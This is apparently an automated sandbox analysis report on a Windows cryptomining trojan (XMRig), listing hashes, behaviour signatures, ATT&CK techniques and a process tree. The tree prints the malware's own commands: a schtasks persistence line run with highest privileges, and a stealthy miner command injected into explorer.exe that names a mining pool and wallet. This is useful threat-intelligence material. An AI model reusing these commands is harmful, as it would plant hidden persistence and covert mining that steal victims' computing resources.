Analysis

  • max time kernel
    145s
  • max time network
    157s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    15-07-2021 07:05

General

  • Target

    e80c9491a679eec91b58c5a8cc20e1b4.exe

  • Size

    167KB

  • MD5

    e80c9491a679eec91b58c5a8cc20e1b4

  • SHA1

    a365aa7c60357c693b1493eb0f13f112525e1e1f

  • SHA256

    7c88f9d38fcb9dd17d733e65a8ebee46d6b74700a02ba5a4614b7b6002d5ef0c

  • SHA512

    244e408fb35e632f442ab0ce825310dae95b661d5e238ff64639149f2cc775807a0f361eba0a251e6fe6b8de8b500ff9a7947c57c1645f2320d442102a73d16c

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e80c9491a679eec91b58c5a8cc20e1b4.exe
    "C:\Users\Admin\AppData\Local\Temp\e80c9491a679eec91b58c5a8cc20e1b4.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3724
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "smssmanagment" /tr '"c:\users\admin\appdata\roaming\smssmanagment.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1408
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "smssmanagment" /tr '"c:\users\admin\appdata\roaming\smssmanagment.exe"'
        3⤵
        • Creates scheduled task(s)
        PID:3364
    • C:\Users\Admin\appdata\roaming\smssmanagment.exe
      "C:\Users\Admin\appdata\roaming\smssmanagment.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:8
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "smssmanagment" /tr '"c:\users\admin\appdata\roaming\smssmanagment.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1380
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "smssmanagment" /tr '"c:\users\admin\appdata\roaming\smssmanagment.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:1888
      • C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
        "C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
        3⤵
        • Executes dropped EXE
        PID:2104
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=4AXqAB3xATp3qXvA883jjVbbvQtqtFoVPLy79LU8TjqiWkK71DnXYAkRsgExycBRqsJ4yBNxAFnqvNmz6KhCDv1Z622gFLs.w2/explorer --pass= --cpu-max-threads-hint=50 --cinit-remote-config="qWmSJPvneRNQfbpvLXoXBy3JpXXnkAtHjwumY21IlTMeLBYzClnsyLDbzMvGOMO4" --donate-level=0 --cinit-idle-wait=5 --cinit-idle-cpu=100 --tls --cinit-stealth
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1292

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Discovery

System Information Discovery

1
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
    MD5

    f5cd230ba12c26c69b3859cf2dfe9ddb

    SHA1

    3444767d8a0616e783d0a177fc4dc7fc4621b48d

    SHA256

    a411b4575ae6fb722ab53c116570d7e7b56aba1bb292c208b12db3485fab08d6

    SHA512

    9670abb676deb21598e6c86379a19c0701768926a91819900324cf796c478d657949bd2b1dc5a0360fa8c5f4a1bb421cef1a75f265fa85a85612d765209770ba

  • C:\Users\Admin\AppData\Roaming\smssmanagment.exe
    MD5

    e80c9491a679eec91b58c5a8cc20e1b4

    SHA1

    a365aa7c60357c693b1493eb0f13f112525e1e1f

    SHA256

    7c88f9d38fcb9dd17d733e65a8ebee46d6b74700a02ba5a4614b7b6002d5ef0c

    SHA512

    244e408fb35e632f442ab0ce825310dae95b661d5e238ff64639149f2cc775807a0f361eba0a251e6fe6b8de8b500ff9a7947c57c1645f2320d442102a73d16c

  • C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
    MD5

    f5cd230ba12c26c69b3859cf2dfe9ddb

    SHA1

    3444767d8a0616e783d0a177fc4dc7fc4621b48d

    SHA256

    a411b4575ae6fb722ab53c116570d7e7b56aba1bb292c208b12db3485fab08d6

    SHA512

    9670abb676deb21598e6c86379a19c0701768926a91819900324cf796c478d657949bd2b1dc5a0360fa8c5f4a1bb421cef1a75f265fa85a85612d765209770ba

  • C:\Users\Admin\appdata\roaming\smssmanagment.exe
    MD5

    e80c9491a679eec91b58c5a8cc20e1b4

    SHA1

    a365aa7c60357c693b1493eb0f13f112525e1e1f

    SHA256

    7c88f9d38fcb9dd17d733e65a8ebee46d6b74700a02ba5a4614b7b6002d5ef0c

    SHA512

    244e408fb35e632f442ab0ce825310dae95b661d5e238ff64639149f2cc775807a0f361eba0a251e6fe6b8de8b500ff9a7947c57c1645f2320d442102a73d16c

  • memory/8-121-0x0000000000000000-mapping.dmp
  • memory/8-135-0x000000001D280000-0x000000001D282000-memory.dmp
    Filesize

    8KB

  • memory/1292-138-0x00000001402EB66C-mapping.dmp
  • memory/1292-137-0x0000000140000000-0x0000000140758000-memory.dmp
    Filesize

    7.3MB

  • memory/1292-145-0x00000000024E0000-0x0000000002500000-memory.dmp
    Filesize

    128KB

  • memory/1292-146-0x00000000024C0000-0x00000000024E0000-memory.dmp
    Filesize

    128KB

  • memory/1292-144-0x00000000024C0000-0x00000000024E0000-memory.dmp
    Filesize

    128KB

  • memory/1292-143-0x0000000000820000-0x0000000000840000-memory.dmp
    Filesize

    128KB

  • memory/1292-140-0x0000000140000000-0x0000000140758000-memory.dmp
    Filesize

    7.3MB

  • memory/1292-139-0x00000000005E0000-0x0000000000600000-memory.dmp
    Filesize

    128KB

  • memory/1380-128-0x0000000000000000-mapping.dmp
  • memory/1408-118-0x0000000000000000-mapping.dmp
  • memory/1888-134-0x0000000000000000-mapping.dmp
  • memory/2104-136-0x000000001BBD0000-0x000000001BBD2000-memory.dmp
    Filesize

    8KB

  • memory/2104-132-0x0000000000140000-0x0000000000141000-memory.dmp
    Filesize

    4KB

  • memory/2104-129-0x0000000000000000-mapping.dmp
  • memory/3364-119-0x0000000000000000-mapping.dmp
  • memory/3724-116-0x0000000000EB0000-0x0000000000EBA000-memory.dmp
    Filesize

    40KB

  • memory/3724-114-0x0000000000680000-0x0000000000681000-memory.dmp
    Filesize

    4KB

  • memory/3724-117-0x0000000000F00000-0x0000000000F01000-memory.dmp
    Filesize

    4KB

  • memory/3724-120-0x0000000002D50000-0x0000000002D52000-memory.dmp
    Filesize

    8KB